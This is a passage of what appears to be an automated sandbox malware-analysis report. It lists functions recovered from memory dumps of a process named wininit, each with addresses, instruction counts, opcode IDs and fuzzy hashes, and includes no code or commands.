                                                                  • Opcode ID: 5436faff75e6999acc94a6c1b8de3d16a2b155d10c749fdba6a8ec1b815793eb
                                                                  • Instruction ID: cffec9cc8e2b6b20f92bd9f92a0abfddc584595a6ff30b6e0bfb3d82174c470c
                                                                  • Opcode Fuzzy Hash: 5436faff75e6999acc94a6c1b8de3d16a2b155d10c749fdba6a8ec1b815793eb
                                                                  • Instruction Fuzzy Hash: 6161F825A0E95E9ED700FBBCA4452FC77A1EF86369F0442B7D80CC7183CE2D64868794
                                                                  Function 00007FF848B00E8E Relevance: 1.5, Strings: 1, Instructions: 201COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000012.00000002.3177638121.00007FF848B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_18_2_7ff848b00000_wininit.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4M_^
                                                                  • API String ID: 0-2545914641
                                                                  • Opcode ID: 6516c722c15cc6831d68dbed82f9d76fbd348f734dc1206c9e2a114ed4838df4
                                                                  • Instruction ID: 1fa2571004d8b53c8177848712931db1b476505517c32a9ff6185077a6706400
                                                                  • Opcode Fuzzy Hash: 6516c722c15cc6831d68dbed82f9d76fbd348f734dc1206c9e2a114ed4838df4
                                                                  • Instruction Fuzzy Hash: 92510621B1EA8A1FE356B73858151B93BE1DF87664B0941FBD48CC72A7DD1C5C438352
                                                                  Function 00007FF848B007D3 Relevance: 1.4, Strings: 1, Instructions: 146COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000012.00000002.3177638121.00007FF848B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_18_2_7ff848b00000_wininit.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: <M_^
                                                                  • API String ID: 0-1376500734
                                                                  • Opcode ID: eba32d7f7a24dab078d9a31f837b077a630f125acba5cbc2e81714b00d344bd4
                                                                  • Instruction ID: f1b78eb405cc82841ba2c3e2f25b34ac4076635546f32461d91ad3d529733ad4
                                                                  • Opcode Fuzzy Hash: eba32d7f7a24dab078d9a31f837b077a630f125acba5cbc2e81714b00d344bd4
                                                                  • Instruction Fuzzy Hash: E041FF25A1E68D9FC341FB3C94A41EC7BE0EF8225CB4082F6D888C7293CE2C65469781
                                                                  Function 00007FF848B01210 Relevance: .5, Instructions: 473COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000012.00000002.3177638121.00007FF848B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_18_2_7ff848b00000_wininit.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7b63b7d08c123457768cd75a0865b3b13534758ac0cd35b3ff9c6159a1efd43e
                                                                  • Instruction ID: feefd39dfae1ba0b230277ada96c32535223f704897c29d0b956414b6d2d1b6a
                                                                  • Opcode Fuzzy Hash: 7b63b7d08c123457768cd75a0865b3b13534758ac0cd35b3ff9c6159a1efd43e
                                                                  • Instruction Fuzzy Hash: 7541E223D0E25A6EE705FF7CB4660FD7B70DF43279B0842B7D9888A493ED1C61858288
                                                                  Function 00007FF848B012FD Relevance: .4, Instructions: 412COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000012.00000002.3177638121.00007FF848B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_18_2_7ff848b00000_wininit.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: afd1176e21f9e1800115b64f9f3ea2581b881078649b47a44448de88d9a8bb89
                                                                  • Instruction ID: d6acee422a6ebdee491b9ecbb8ed42571eff34dd45a42577b230eef1ad43dc5e
                                                                  • Opcode Fuzzy Hash: afd1176e21f9e1800115b64f9f3ea2581b881078649b47a44448de88d9a8bb89
                                                                  • Instruction Fuzzy Hash: E0218B2290E68A5FD746FB78A86A1FD7BB0EF43258F0902B7C488DA193ED1C55498345
                                                                  Function 00007FF848B00985 Relevance: .3, Instructions: 346COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000012.00000002.3177638121.00007FF848B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_18_2_7ff848b00000_wininit.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 248a16951b7209f121cf41016c6a768eb0ef2a1bf6a706c53ac04f6a3053caa6
                                                                  • Instruction ID: 8a2effaac89b254d72441b4a6497d574ea1063c5767035297dcecd22a202ae51
                                                                  • Opcode Fuzzy Hash: 248a16951b7209f121cf41016c6a768eb0ef2a1bf6a706c53ac04f6a3053caa6
                                                                  • Instruction Fuzzy Hash: 72A1F826B0D96A9ED700BF7CA8451FD7BA0EF86379B0442B7D548CB183CE28608687D1
                                                                  Function 00007FF848B009D3 Relevance: .3, Instructions: 320COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000012.00000002.3177638121.00007FF848B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_18_2_7ff848b00000_wininit.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a2e55a5584a8eec2ff6855b963f6c4fd7c9ec5c21164f736d9ff60a048bca20d
                                                                  • Instruction ID: 314a167b60421118b2784bef277a60430ca0f8d1bc423c6d1f9d3892f748145d
                                                                  • Opcode Fuzzy Hash: a2e55a5584a8eec2ff6855b963f6c4fd7c9ec5c21164f736d9ff60a048bca20d
                                                                  • Instruction Fuzzy Hash: 0A91D42AB0D96E9ED700BB7CA4452FD7BA0EF86379B0442B7D548CA183CD29608687D4
                                                                  Function 00007FF848B00A08 Relevance: .3, Instructions: 305COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000012.00000002.3177638121.00007FF848B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_18_2_7ff848b00000_wininit.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f0dea555742c978ae85060283e87d201457047c442636b307e74e81669d8adcf
                                                                  • Instruction ID: 2bde460afd687bd9b1de9d938eb0dba57d27f894bb3ef002ecd0ca8aa9fd46b3
                                                                  • Opcode Fuzzy Hash: f0dea555742c978ae85060283e87d201457047c442636b307e74e81669d8adcf
                                                                  • Instruction Fuzzy Hash: D981E626B0D96E9EDB00BF7CA4452FD7BA1EF86369B0442B7D548C6183CE29608687D4
                                                                  Function 00007FF848B00A10 Relevance: .3, Instructions: 301COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000012.00000002.3177638121.00007FF848B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_18_2_7ff848b00000_wininit.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1a09484126b85586a5938a014bfff25c6dbe82590111041b5100351f4b977705
                                                                  • Instruction ID: a5c3cabe9d2c5bf591470e05507a0b19627a12f513d67d4bd3be60c24354757d
                                                                  • Opcode Fuzzy Hash: 1a09484126b85586a5938a014bfff25c6dbe82590111041b5100351f4b977705
                                                                  • Instruction Fuzzy Hash: 3781F626B0D96E9EDB00BF7CA4452FD7BA1EF86369B0442B7D548C7183CE29608687D4
                                                                  Function 00007FF848B00A48 Relevance: .3, Instructions: 270COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000012.00000002.3177638121.00007FF848B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_18_2_7ff848b00000_wininit.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e6d352ba4c66e0884db1d896690362c92eb32962c28f3286a950f72cde4f6e7a
                                                                  • Instruction ID: 87f9f3eea47fd796ea3f5f3c4005a0f655732a59f9bb12ecd232b69f6ac7c2b4
                                                                  • Opcode Fuzzy Hash: e6d352ba4c66e0884db1d896690362c92eb32962c28f3286a950f72cde4f6e7a
                                                                  • Instruction Fuzzy Hash: 9A71E526B0A95E9EDB00BB7CA4452FD7BA1EF86369B0442B7D448C7183CE296086C7D0
                                                                  Function 00007FF848B00778 Relevance: .2, Instructions: 157COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000012.00000002.3177638121.00007FF848B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_18_2_7ff848b00000_wininit.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2a494803b4c0e7463190a6c87056e3782eeaadda5e63821915d299e37540367a
                                                                  • Instruction ID: c8c2556a0628eeff953ed09df31c5c1592274a74dfddba8ae3210a47f6f6b525
                                                                  • Opcode Fuzzy Hash: 2a494803b4c0e7463190a6c87056e3782eeaadda5e63821915d299e37540367a
                                                                  • Instruction Fuzzy Hash: 27510321A1E6C9AFD341FB3C94A11ED3FF0EF4225CB8441F6D4888B297DE2C55469781
                                                                  Function 00007FF848B00638 Relevance: .1, Instructions: 138COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000012.00000002.3177638121.00007FF848B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_18_2_7ff848b00000_wininit.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 05f66949e833edf5cbafee1448530f8f0499337bfb76d708d1c4aed9ded9ae91
                                                                  • Instruction ID: ada716390f70cd5c4a5dbefac81946ca63e1a96ec285039287c5de4433676751
                                                                  • Opcode Fuzzy Hash: 05f66949e833edf5cbafee1448530f8f0499337bfb76d708d1c4aed9ded9ae91
                                                                  • Instruction Fuzzy Hash: 4D31E021B1DA494FE799EB2C945A379B6C2EF89351F0402BEE40EC32D7EE689C018340
                                                                  Function 00007FF848B00D21 Relevance: .1, Instructions: 124COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000012.00000002.3177638121.00007FF848B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_18_2_7ff848b00000_wininit.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ac08684a7a8005db0e83adcca5772dc5645f93ecb8ce6adb5442c171440c7277
                                                                  • Instruction ID: 0ecf58c1c438ac81e7b144ef159d5c8c9feb8e818c1785f8a0114db071c90a01
                                                                  • Opcode Fuzzy Hash: ac08684a7a8005db0e83adcca5772dc5645f93ecb8ce6adb5442c171440c7277
                                                                  • Instruction Fuzzy Hash: F531A121B1DD495FE744BBB8581A3BDB6D2EF99751F0442BAE40DC3293EE2C58414391
                                                                  Function 00007FF848B00BD3 Relevance: .1, Instructions: 119COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000012.00000002.3177638121.00007FF848B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_18_2_7ff848b00000_wininit.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: efd4c98f8f7815ce348e0db7885621f62da0bb6ab09d1b5f76c7a0a3e17d4cd2
                                                                  • Instruction ID: fe067aae70c21ae297d256577f3a4df1c6213e2c1882a51f02c9c0f198a4dd30
                                                                  • Opcode Fuzzy Hash: efd4c98f8f7815ce348e0db7885621f62da0bb6ab09d1b5f76c7a0a3e17d4cd2
                                                                  • Instruction Fuzzy Hash: E841BD34A1DA4E9FDB84FB7884652FD7BF2FF89304F5041B5D008D3282DE2868068740
                                                                  Function 00007FF848B00870 Relevance: .1, Instructions: 76COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000012.00000002.3177638121.00007FF848B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_18_2_7ff848b00000_wininit.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 13544751973cd65800032fbc7f46d95710f54cc52ba02a8f08abc9f3fd9964e8
                                                                  • Instruction ID: 41f066430327b026d1dcaf8a05d926cb5db99d89506088f3a16b7403015282de
                                                                  • Opcode Fuzzy Hash: 13544751973cd65800032fbc7f46d95710f54cc52ba02a8f08abc9f3fd9964e8
                                                                  • Instruction Fuzzy Hash: FD21822462A68DDFD785FB3884A16ED7FF1EF89208B8080F5D948C3397CE2C5A009751
                                                                  Function 00007FF848B022C1 Relevance: .0, Instructions: 43COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000012.00000002.3177638121.00007FF848B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_18_2_7ff848b00000_wininit.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: dab0a9ba6cf7b0040100c0fdcb3e1c182b121df0fa1bd0f97e8279d40c5dd2b1
                                                                  • Instruction ID: dbb06672b09c291408f2f2b08953a2d6be3bfb3e67d72d66996f24d539a24ae6
                                                                  • Opcode Fuzzy Hash: dab0a9ba6cf7b0040100c0fdcb3e1c182b121df0fa1bd0f97e8279d40c5dd2b1
                                                                  • Instruction Fuzzy Hash: 5E01211890CAC54FE782B738086547A7FF0DFD2280B4804FAE888D64A7E908A9898346

                                                                  Executed Functions

                                                                  Function 00007FF848AE12F8 Relevance: .8, Instructions: 750COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.3276464648.00007FF848AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_7ff848ae0000_wininit.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 43d2cfefd6b737d4eb6ad804670d1746fd6691a30adbba2864b6fc8a309c1cdf
                                                                  • Instruction ID: d23e1febf60df05e32005563089a5d178a1ba854d9c549f80c04c2d816cbaf0e
                                                                  • Opcode Fuzzy Hash: 43d2cfefd6b737d4eb6ad804670d1746fd6691a30adbba2864b6fc8a309c1cdf
                                                                  • Instruction Fuzzy Hash: F332C420B6DA595FE798FB38845A3BDB7D2FF88745F440979D40EC3286DE6CA8018742
                                                                  Function 00007FF848AE1719 Relevance: .7, Instructions: 695COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.3276464648.00007FF848AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_7ff848ae0000_wininit.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: fca84d61a09a6e27ec083ef079e7f66c58a1ed2a53abd1cc1916fcc45bcca014
                                                                  • Instruction ID: fd5c8378a9f5d513baa9781161f19b81249e7b232444b8ed4aa8dca4ee384bcd
                                                                  • Opcode Fuzzy Hash: fca84d61a09a6e27ec083ef079e7f66c58a1ed2a53abd1cc1916fcc45bcca014
                                                                  • Instruction Fuzzy Hash: 6F22C121A6DA595FE798FB38845A3BD76D2FF88781F440979D40EC3282DE6CA8018752
                                                                  Function 00007FF848AE20F5 Relevance: .2, Instructions: 208COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.3276464648.00007FF848AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_7ff848ae0000_wininit.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a402ca875b79a9400fae756d567b4521100f69b74a232a858a7b4064261ec6a4
                                                                  • Instruction ID: 80bab8722ef1d9193721f6197ae42c051340070c2ba1d7badd6ca4e653c72298
                                                                  • Opcode Fuzzy Hash: a402ca875b79a9400fae756d567b4521100f69b74a232a858a7b4064261ec6a4
                                                                  • Instruction Fuzzy Hash: 1A511D20A5E6C94FD787AB38582527ABFE4DF87269F0804FBE089C7193DE5C0806C356
                                                                  Function 00007FF848AE0AD3 Relevance: 1.5, Strings: 1, Instructions: 223COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.3276464648.00007FF848AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_7ff848ae0000_wininit.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 9O_^
                                                                  • API String ID: 0-1716625314
                                                                  • Opcode ID: 21964c1b176be20d799612bb8d023712839be85b739aaea194395b782eb114b0
                                                                  • Instruction ID: b5e84cc90d02edb629a2412982e63e888af16759a5249ae25b90c2086ef023eb
                                                                  • Opcode Fuzzy Hash: 21964c1b176be20d799612bb8d023712839be85b739aaea194395b782eb114b0
                                                                  • Instruction Fuzzy Hash: 7E61E626A4E51A9FD700FB7CA4466FC77A0FF85369F044936D94CCB183CE2C648687A5
                                                                  Function 00007FF848AE0E8E Relevance: 1.5, Strings: 1, Instructions: 201COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.3276464648.00007FF848AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_7ff848ae0000_wininit.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4O_^
                                                                  • API String ID: 0-2486912895
                                                                  • Opcode ID: a5b145e588305298508b5b1a98756243bd57490e72a830ab68a29b0ba4c43045
                                                                  • Instruction ID: 7b90e371c94037050863a5ee8e099b57efbf19e1ce82c28fb458882489f35d97
                                                                  • Opcode Fuzzy Hash: a5b145e588305298508b5b1a98756243bd57490e72a830ab68a29b0ba4c43045
                                                                  • Instruction Fuzzy Hash: 38510621B1EA861FE356B73858162B93BE1EF86660B0940FBD48CC71A7DD5C5C468362
                                                                  Function 00007FF848AE07D3 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.3276464648.00007FF848AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_7ff848ae0000_wininit.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: <O_^
                                                                  • API String ID: 0-1368354704
                                                                  • Opcode ID: afbc25d8340d55325ae2a297a9952238b3eb62fa31eb2b471e9aacdc6bfe88ed
                                                                  • Instruction ID: 2630734a273148d9fdbb1da4bb9af83aa47294658ab9ba2f1cd993b4e260b9ea
                                                                  • Opcode Fuzzy Hash: afbc25d8340d55325ae2a297a9952238b3eb62fa31eb2b471e9aacdc6bfe88ed
                                                                  • Instruction Fuzzy Hash: 49414536A4E64D5FD301FF3CA0956FC3BB0EF81258F4444BACA88CB293CD2859459B51
                                                                  Function 00007FF848AE1210 Relevance: .5, Instructions: 475COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.3276464648.00007FF848AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_7ff848ae0000_wininit.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 42d29530838f56f625dc8ae9c0d0c82c7e398030de235cdc351ef2a1c17ff94a
                                                                  • Instruction ID: d140f3ea99e532c6221b02cb56f0c8e900e755d913010849ee24289cd3c2d0df
                                                                  • Opcode Fuzzy Hash: 42d29530838f56f625dc8ae9c0d0c82c7e398030de235cdc351ef2a1c17ff94a
                                                                  • Instruction Fuzzy Hash: 2441F727D0E6665BE301FB7CB46A0FD3BA0DF4227DB084577D9888A093DD1C64C94298
                                                                  Function 00007FF848AE12FD Relevance: .4, Instructions: 414COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.3276464648.00007FF848AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_7ff848ae0000_wininit.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a5899f8d738d293800d706f1a88d5b22fafefbf685475fa8d67eb0bdf5accb04
                                                                  • Instruction ID: f8c5542832d7a2efaccca264950f0f400f2ed554827236a7f5683ac4693431a8
                                                                  • Opcode Fuzzy Hash: a5899f8d738d293800d706f1a88d5b22fafefbf685475fa8d67eb0bdf5accb04
                                                                  • Instruction Fuzzy Hash: 9C21A02290E7965FE302FB7CA86A1FD3BB0EF82259F0844B7C488CA093D91C58498355
                                                                  Function 00007FF848AE0985 Relevance: .3, Instructions: 346COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.3276464648.00007FF848AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_7ff848ae0000_wininit.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f596cd70f649f7cdb9e891592ce5539a3c75ba72cbcd2689d7f540535e911095
                                                                  • Instruction ID: 6fd45efe60ab26fa4e25c50d7f6b42bee5626617d6e35956d8ca7557fff8fb75
                                                                  • Opcode Fuzzy Hash: f596cd70f649f7cdb9e891592ce5539a3c75ba72cbcd2689d7f540535e911095
                                                                  • Instruction Fuzzy Hash: 52A1172AB0D92A9ED700FB7DB4456FD7B60EFC5375B044577C648CB183CA28648A87E0
                                                                  Function 00007FF848AE09D3 Relevance: .3, Instructions: 320COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.3276464648.00007FF848AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_7ff848ae0000_wininit.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3afc94a716750c030cdcca369cfd6af0293ca7948bca84b61c519b6c1de089dc
                                                                  • Instruction ID: 9b37bde2f925a1a4e5a8865b107bc15d8a2ec00f52c05125c889b901b2a04667
                                                                  • Opcode Fuzzy Hash: 3afc94a716750c030cdcca369cfd6af0293ca7948bca84b61c519b6c1de089dc
                                                                  • Instruction Fuzzy Hash: 1D91062AB0D92A9AD700FB7DB4056FD7BA0EFC5375B044977C648CB183C928648A87E0
                                                                  Function 00007FF848AE0A08 Relevance: .3, Instructions: 305COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.3276464648.00007FF848AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_7ff848ae0000_wininit.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f3a1cadef24382d747bbf2daaf1b24904508acbb538b0f09b55e9fd414690e3e
                                                                  • Instruction ID: 955be9f50c8180fec5dae8095ea0859389f3e4333d72fbfbf3954fbda88166a9
                                                                  • Opcode Fuzzy Hash: f3a1cadef24382d747bbf2daaf1b24904508acbb538b0f09b55e9fd414690e3e
                                                                  • Instruction Fuzzy Hash: 4F81F72AB0D92A9AD700FB7DB4456FD7BA0EFC5375B044577DA48CB183CA28648687E0
                                                                  Function 00007FF848AE0A10 Relevance: .3, Instructions: 301COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.3276464648.00007FF848AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_7ff848ae0000_wininit.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f851ea24404b4c5fcd00ea617351e64ea19a6ca1ad701285b558f25e70bc60d9
                                                                  • Instruction ID: efa3b00ebf02ecb93834af7e064aefb67415015aa8b21a71bc34c8741b45c27c
                                                                  • Opcode Fuzzy Hash: f851ea24404b4c5fcd00ea617351e64ea19a6ca1ad701285b558f25e70bc60d9
                                                                  • Instruction Fuzzy Hash: E781F72AB0D92A9AD700FB7DB4056FD7B60EFC5375B044577DA48CB183CA28648687E0
                                                                  Function 00007FF848AE0A48 Relevance: .3, Instructions: 270COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.3276464648.00007FF848AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_7ff848ae0000_wininit.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d3f487a084a6d4800da0870e6916fb05b0ce0a5384ce5da9be247f24e50d74ba
                                                                  • Instruction ID: 394a89ac07f2608923a56567d431ba5d6b334fb6e83af5022e2f7d39fd2aff76
                                                                  • Opcode Fuzzy Hash: d3f487a084a6d4800da0870e6916fb05b0ce0a5384ce5da9be247f24e50d74ba
                                                                  • Instruction Fuzzy Hash: DD71072AB0991A9ED700FB7DB4466FD7BA0FFC5365B044577D548CB183CA286486C7D0
                                                                  Function 00007FF848AE0778 Relevance: .2, Instructions: 159COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.3276464648.00007FF848AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_7ff848ae0000_wininit.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 595d582c2bb171b4cb6e3f0eb077053db877df8415dffed44f1d8d4c022b4eda
                                                                  • Instruction ID: 0144febc9889c70231ad4437a9584bcaacde7a0d7e61c1e080e8154c1945fbdb
                                                                  • Opcode Fuzzy Hash: 595d582c2bb171b4cb6e3f0eb077053db877df8415dffed44f1d8d4c022b4eda
                                                                  • Instruction Fuzzy Hash: ED516622A4E68D5FD301FF3CA4A52FD3FB0EF82258F4404BAC988CB287CD2819458B51
                                                                  Function 00007FF848AE0638 Relevance: .1, Instructions: 138COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.3276464648.00007FF848AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_7ff848ae0000_wininit.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 566ddb936fc73ed22d18cc18429ce0e285565245f39fd1aa5e5c81b9e4ae94ed
